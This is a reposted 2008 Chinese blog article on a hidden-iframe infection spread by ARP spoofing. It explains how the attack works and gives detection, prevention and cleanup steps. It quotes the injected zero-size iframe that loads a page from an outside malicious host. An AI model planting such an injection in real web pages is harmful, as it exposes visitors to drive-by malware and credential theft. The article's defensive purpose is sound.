超级网迷

超级网迷+ 电脑迷+ 音乐迷
个人资料
正文

【转贴】iframe攻击的原理与对策

(2008-04-13 21:34:00) 下一个

iframe攻击

Posted on 2008-04-08 18:18 by 停留的风

今天遇到一个问题,当打开网页时,页面大多都偏离了原来的位置,像新浪、腾讯等大型网站一样,首页的整个页面都居左,这肯定是中招了,最后在网页源代码中发现了这样一条代码
<iframe src=http://a.158dm.com/one/arp.htm width=0 height=0 frameborder=0>iframe> 
而且这段代码,在所有出现为题的网页中都发现了。可见是真的中招。到网上查询了相关的信息,好多都是通过替换将类似的代码段进行替换,但是,在打开新的网页的时候就会出现这种情况,显然该方法不可取。
最后我的解决方案:清楚所有的临时文件。
google上一搜,才知道中了iframe 病毒,是中ARP欺骗的病毒攻击了。

那么什么是“ARP欺骗”呢?

首先,ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。

从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。

第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。

第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,“网络掉线了”。

ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。

而本次我的网站服务器所在的托管机房同一局域网中的某台服务器即被感染了ARP欺骗木马,所以就影响了整个机房的其他服务器,于是服务器中成千上万的虚拟主机网站就全部遭殃了,木马种植者站点访问量也是猛增,这还是小事,该木马发作时除了会导致同一局域网内的其他用户上网出现时断时续的现象外,还会窃取用户密码。如盗取QQ密码、盗取各种网络游戏密码和账号去做金钱交易,盗窃网上银行账号来做非法交易活动等,这是木马的惯用伎俩,给用户造成了很大的不便和巨大的经济损失。

如何检查本机是否中了ARP欺骗木马病毒

“CTRL”+“ALT”+“DELETE”键打开“Windows任务管理器”窗口,查看有没有“MIR0.dat”的进程,如果有,表示中毒了,需要立即“结束该进程”。

如何检查局域网内感染ARP欺骗木马病毒的计算机

“开始”菜单“运行”“cmd”打开MSDOS窗口,输入“ipconfig”获得“Default Gateway”默认网关。

继续执行命令“arp -a”,查看默认网关IP对应的“Physical Address”值,在网络正常时这就是网关的正确物理地址,在网络受“ ARP 欺骗”木马影响而不正常时,它就是木马所在计算机的网卡物理地址。也可以扫描本子网内的全部IP地址,然后再查ARP表。如果有一个 IP 对应的物理地址与网关的相同,那么这个IP地址和物理地址就是中毒计算机的IP地址和网卡物理地址。

如何防范计算机遭受ARP欺骗

1、不要把你的网络安全信任关系建立在ip基础上或mac基础上,(rarp同样存在欺骗的问题),理想的关系应该建立在ip+mac基础上。
2、设置静态的mac-->ip对应表,不要让主机刷新你设定好的转换表。
3、除非很有必要,否则停止使用ARP,将ARP做为永久条目保存在对应表中。
4、使用ARP服务器。通过该服务器查找自己的ARP转换表来响应其他机器的ARP广播。确保这台ARP服务器不被黑。
5、使用"proxy"代理ip的传输。
6、使用硬件屏蔽主机。设置好你的路由,确保ip地址能到达合法的路径。(静态配置路由ARP条目),注意,使用交换集线器和网桥无法阻止ARP欺骗。
7、管理员定期用响应的ip包中获得一个rarp请求,然后检查ARP响应的真实性。
8、管理员定期轮询,检查主机上的ARP缓存。
9、使用防火墙连续监控网络。注意有使用SNMP的情况下,ARP的欺骗有可能导致陷阱包丢失。

推荐工具:欣向ARP工具,包括很全面的ARP防范的功能。(其中包括WinPcap_3_0.,请务必先安装此软件)下载地址:
http://www.nuqx.com/downcenter.asp

ARP解决方法/工具+真假ARP防范区别方法+ARP终极解决方案
http://www.txwm.com/BBS384837.vhtml

ARP攻击防范与解决方案专题
http://www.luxinjie.com/s/arp/


如何查杀

首先就是把补丁安装上,
第一步,打补丁
补丁名字:这个漏洞在四月初就被发现了,赶紧补
windows的ANI漏洞被人利用来传木马,
有更新windows的安全更新
用卡巴能阻止其下载木马
http://zhidao.baidu.com/question/23742350.html?si=1
赶紧下载补丁。
微软官方鼠标漏洞发布ANI补丁(下载)
http://www.91kb.cn/read-htm-tid-1991.html

针对微软的发的漏洞补丁的光标漏洞蠕虫专杀工具
http://www.91kb.cn/read.php?tid=2468

艾尼光标漏洞。

第二步,杀毒:

1、先清除所有网页临时文件,方法,打开IE 工具,选项,删除临时文件夹中的所有脱机文件。

2、删除    windows 目录下的 logo_1.exe,删除windowssystemieframe.dll,最后用升级到最新版的杀毒软件全盘杀一次。

3、防范的办法,如果是局域网内部的,肯定怎么杀也杀不净,其实不是你机子上的病毒了。你机子上的再怎么查也查不到了。可是为什么访问网页的时候还是首先会去 w3213.com呢?
  

第三步,以后上网养成用火狐浏览器上网,如果你不喜欢火狐,你查资料的时候一定要使用火狐,
不然人家有病毒,你也进,自着苦吃,火狐下载:
http://cn.91fox.cn

第四步,下载一个叫着 Antiarp的软件,安装。



[ 打印 ]
阅读 ()评论 (0)
评论
目前还没有任何评论
登录后才可评论.